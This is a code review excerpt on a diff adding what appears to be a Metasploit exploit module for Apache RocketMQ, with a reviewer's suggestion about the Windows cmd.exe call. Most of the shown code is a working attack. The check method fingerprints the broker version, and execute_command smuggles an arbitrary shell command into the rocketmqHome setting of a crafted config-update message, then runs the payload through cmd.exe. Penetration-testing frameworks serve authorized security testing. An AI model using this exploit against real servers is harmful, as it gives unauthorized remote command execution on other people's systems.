modules/exploits/multi/http/apache_rocketmq_update_config.rb

```diff
@@ -0,0 +1,161 @@
+  def check
+    data = '{"code":105,"extFields":{"Signature":"/u5P/wZUbhjanu4LM/UzEdo2u2I=","topic":"TBW102","AccessKey":"rocketmq2"},"flag":0,"language":"JAVA","opaque":1,"serializeTypeCurrentRPC":"JSON","version":401}'
+    data_length = "\x00\x00\x00" + [data.length].pack('C')
+    header = "\x00\x00\x00" + [data.length + data_length.length].pack('C')
+    begin
+      sock = connect(true, { 'RHOST' => datastore['RHOST'], 'RPORT' => 9876 })
+      sock.put(header + data_length + data)
+      buf = sock.get
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      print_error("Unable to connect: #{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    ensure
+      disconnect
+    end
+
+    return Exploit::CheckCode::Unknown('RocketMQ did not respond to the request for version information') unless buf
+
+    id = buf.match(/"version":(\d+)/)[1].to_i
+    version =  Rex::Version.new(get_version(id).gsub('V','').gsub('_','.'))
+
+    return Exploit::CheckCode::Unknown('Unable to determine the version') unless version
+
+    if version > Rex::Version.new('5.0.0')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}") if version <= Rex::Version.new('5.1.0')
+    elsif version <= Rex::Version.new('4.9.5')
+      return Exploit::CheckCode::Appears("RocketMQ version: #{version}")
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    data = '`{"code":25,"flag":0,"language":"JAVA","opaque":0,"serializeTypeCurrentRPC":"JSON","version":395}filterServerNums=1
+rocketmqHome=' + cmd.encode('UTF-8') + "\x3b\x0a"
+    header = "\x00\x00\x00" + [data.length + 3].pack('C') + "\x00\x00\x00"
+    payload = header + data
+
+    begin
+      vprint_status("Payload command to be executed: #{cmd}")
+      sock = connect
+      hex_payload_length = (payload.length - 4).to_s(16)
+      print_good("Payload length: #{hex_payload_length.to_i(16)}, (must not exceed 255 characters)")
+
+      if hex_payload_length.to_i(16) > 255
+        fail_with(Failure::BadConfig, "Payload length is too long, please shorten filenames or choose a new payload. Current payload length is #{hex_payload_length.to_i(16)} the max payload length is 255")
+      end
+      vprint_status("Payload is #{payload}")
+
+      sock.put(payload)
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      print_error("Unable to connect: #{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    end
+  end
+
+  def exploit
+    print_status("Executing target: #{target.name} with payload #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :win_cmd
+      execute_command("C:\\Windows\\System32\\cmd.exe /c #{payload.encoded}")
```

Comment:
```suggestion
      execute_command("cmd.exe /c #{payload.encoded}")
```

Also look at `Msf::Post::Windows.escape_cmd_literals`